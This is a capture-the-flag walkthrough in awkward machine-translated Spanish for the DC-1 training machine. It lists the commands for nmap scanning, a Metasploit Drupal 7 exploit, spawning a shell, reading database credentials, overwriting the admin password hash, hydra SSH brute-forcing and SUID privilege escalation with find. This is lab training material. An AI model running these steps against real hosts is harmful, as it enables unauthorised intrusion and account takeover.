Directorio de artículos
prefacio
Este problema explica el proceso de penetración de la máquina objetivo dc-1
1. Recopilación de información
1. Descubrimiento de hosts
nmap -sP 192.168.1.0/24 //扫描自己网段存活的主机
2. Escaneo de puertos
nmap -sT -p- --min-rate 2000 192.168.1.8
Se encuentra que puertos conocidos como el 22 y el 80 están abiertos
2. Encuentra vulnerabilidades
1. Página de destino
Puede ver la versión drupal 7 del sistema de administración de contenido,
por lo que puede intentar ver si hay alguna vulnerabilidad explotable
utilización 2.msf
searchsploit drupal
msfconsole
search drupal 7.x
use 0
show options
set rhosts 192.168.1.8
run
3. Obtener bandera1
shell
python -c 'import pty;pty.spawn("/bin/bash")'
4. Obtener bandera2
Encuentre archivos sospechosos
Encuentre flag2 en sites/default/default.setting.php,
puede ver que se proporciona el nombre de usuario y la contraseña de la base de datos,
puede iniciar sesión en la base de datos para ver
3. Inicie sesión en la base de datos
1. Cambiar la contraseña de administrador
mysql -udbuser -pR0ck3t
show databases;
use drupaldb;
show tables;
slect * from users;
Genere contraseñas hash personalizadas para su modificación
php scripts/password-hash.sh password
update users set pass="$s$DRYYqPjar/0Po8UWLFN0II/0.77dz7Q16YQXvyaB6cl0EJr6vEIy" where uid=1;
2. Inicie sesión para obtener flag3
4. Explosión ssh
1. Ver archivos confidenciales
Puede ver que hay un usuario flag4 y puede iniciar sesión, pero no sabe la contraseña, intente explotar
hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.8 ssh
2. inicio de sesión ssh
ssh flag4@192.168.1.8
3. Obtener bandera4
5. Elevación de derechos
1. Escalada de privilegios de bit SUID
find / -user root -perm -4000 -print 2>/dev/null //查找具有suid位的命令
2. Inicie sesión en el sitio web para consultar
Escalada de consultas de sitios con privilegios
find . -exec /bin/sh \; -quit
3. Consigue la bandera final
Resumir
Familiarizado con múltiples máquinas de tiro.